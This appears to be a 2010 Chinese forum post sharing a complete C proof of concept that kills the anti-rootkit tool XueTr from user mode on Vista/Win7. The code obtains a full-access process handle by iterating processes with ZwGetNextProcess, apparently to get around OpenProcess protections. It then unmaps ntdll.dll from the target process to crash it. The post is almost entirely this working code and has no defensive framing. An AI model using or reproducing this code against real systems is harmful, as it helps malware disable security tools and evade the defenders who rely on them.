|
|
标题只是个噱头,主要是把FxOpenProcess转成了C代码,并作了适当精简。
本代码稍加修改可以编译成64位程序,不过觉得这么做没有意义而已。
在MiniFxOpenProcess中的bInheritHandle参数没有意义,加上只是为了和OpenProcess函数的形参兼容。
本POC仅支持Vista/Win7。
//Kill XueTr in Ring 3
//Author: Tesla.Angela
//Updata: 2010-12-12
#include <stdio.h>
#include <windows.h>
typedef long (__stdcall *ZWGETNEXTPROCESS)(HANDLE,long,long,long,PHANDLE);
typedef long (__stdcall *ZWUNMAPVIEWOFSECTION)(HANDLE,PVOID);
typedef ULONG (__stdcall *GETPROCESSID)(HANDLE Process);
HANDLE MiniFxOpenProcess(ULONG dwDesiredAccess, ULONG bInheritHandle, ULONG dwProcessId)
{
ZWGETNEXTPROCESS ZwGetNextProcess=(ZWGETNEXTPROCESS)GetProcAddress(GetModuleHandleW(L"ntdll.dll"),"ZwGetNextProcess");
GETPROCESSID GetProcessId=(GETPROCESSID)GetProcAddress(GetModuleHandleW(L"kernel32.dll"),"GetProcessId");
HANDLE hCurrent=0, hNext=0;ULONG dwPid=0;long Status=0;
if((PVOID)ZwGetNextProcess == NULL || (PVOID)GetProcessId == NULL) return (HANDLE)0;
Status = ZwGetNextProcess(0, dwDesiredAccess, 0, 0, &hNext);
if (Status >= 0)
{
do{
hCurrent = hNext;
dwPid = GetProcessId(hCurrent);
if (dwPid==dwProcessId) return hCurrent;
Status = ZwGetNextProcess(hCurrent, dwDesiredAccess, 0, 0, &hNext);
CloseHandle(hCurrent);
}while(hCurrent != 0);
}
return (HANDLE)0;
}
int main()
{
ULONG pid=0;HANDLE hProc=0;
printf("Input PID: ");scanf("%ld",&pid);
hProc=MiniFxOpenProcess(PROCESS_ALL_ACCESS,0,pid);printf("ProcessHandle: %ld\n",hProc);
HMODULE hNtdll=GetModuleHandleW(L"ntdll.dll");
ZWUNMAPVIEWOFSECTION ZwUnmapViewOfSection=(ZWUNMAPVIEWOFSECTION)GetProcAddress(hNtdll,"ZwUnmapViewOfSection");
if(hProc!=0)
ZwUnmapViewOfSection(hProc,(PVOID)hNtdll);
return 0;
}
|
|
发表于 2010-12-12 08:58:19
发表于 2010-12-12 15:35:18
